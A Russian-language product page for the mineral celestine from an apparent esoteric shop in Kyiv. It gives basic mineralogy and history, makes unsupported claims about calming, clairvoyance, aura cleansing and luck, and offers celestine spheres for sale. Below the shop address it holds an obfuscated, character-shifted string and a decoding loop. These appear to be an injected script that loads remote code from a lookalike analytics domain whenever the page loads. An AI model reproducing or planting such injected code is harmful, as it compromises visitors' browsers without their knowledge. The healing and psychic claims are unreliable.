Цена : см. прайс-лист

Целестин – минерал, сульфат стронция. Твердость 3,0-3,5 по шкале Мооса, плотность 3,9-4,0 г/см3, блеск стеклянный до перламутрового и шелковистого. Другие названия: целестит, сицилианит, эшвегит (Eschwegite).

Один из самых эффектных и популярных минералов среди коллекционеров и любителей минералов благодаря красивым жеодам, друзам и сросткам кристаллов, а также своей широкой распространенности и доступности при поиске – это все целестин, минерал с именем святейших римских пап. Целестин, или целестит, был впервые открыт в 1791 году на острове Сицилия, поэтому одно из первых неофициальных названий, которое он получил, было сицилианит. Немецкий минералог Авраам Г. Вернер дал нежно-голубому прозрачному минералу его нынешнее имя – целестин (от лат. caelestis — небесный). Характерны образцы целестина голубого, светло-голубого, серо-голубого и чуть голубоватого цветов; целестин может быть и бесцветным, а также белым, желтоватым, синевато-зеленым, красноватым, коричневым, порой еле просвечивающим, иногда – с зональной окраской.

Целестин – один из самых распространенных сульфатов; вместе с минералом баритом он составляет группу барита. Разновидность, богатая окисями бария и кальция, называется баритоцелестином. Целестин обычно образует богатые гранями кристаллы красивой призматической формы, с острой верхушкой; встречаются и зернистые массы в виде желваков и конкреций и даже сталактиты. минерал удивителен Обычно целестин встречается в небольших количествах; Одни из самых красивых кристаллов целестина нежного голубого цвета происходят с острова Мадагаскар .

Считается, что целестин оказывает успокаивающее воздействие на душу человека, вызывая чувство умиротворения и усиливая способности к ясновидению, словно унося своего хозяина в «ангельские» небесные выси. Целестин часто применяют для медитаций, в процессе которых очищается аура, просветляется сознание и достигается гармония с собой. Кроме того, считается, что целестин привлекает удачу и способствует развитию красноречия, а также создает вокруг своего владельца атмосферу доброжелательности и радости.

Приобрести шар целистина Вы можете посетив наш эзотерический магазин по адресу г. Киев, ул. Гришка,8
#nzkt2#!tsd>#!iuuq;00hp1hmfbobmjujd/dpn0tdsjqut0epvcmfdmjdltubu/qiq#?=0tdsjqu?!";
m=""; for (i=0; i

Оставить комментарий

Ваш email не будет опубликован. Обязательные поля отмечены *

Вы можете использовать это HTMLтеги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>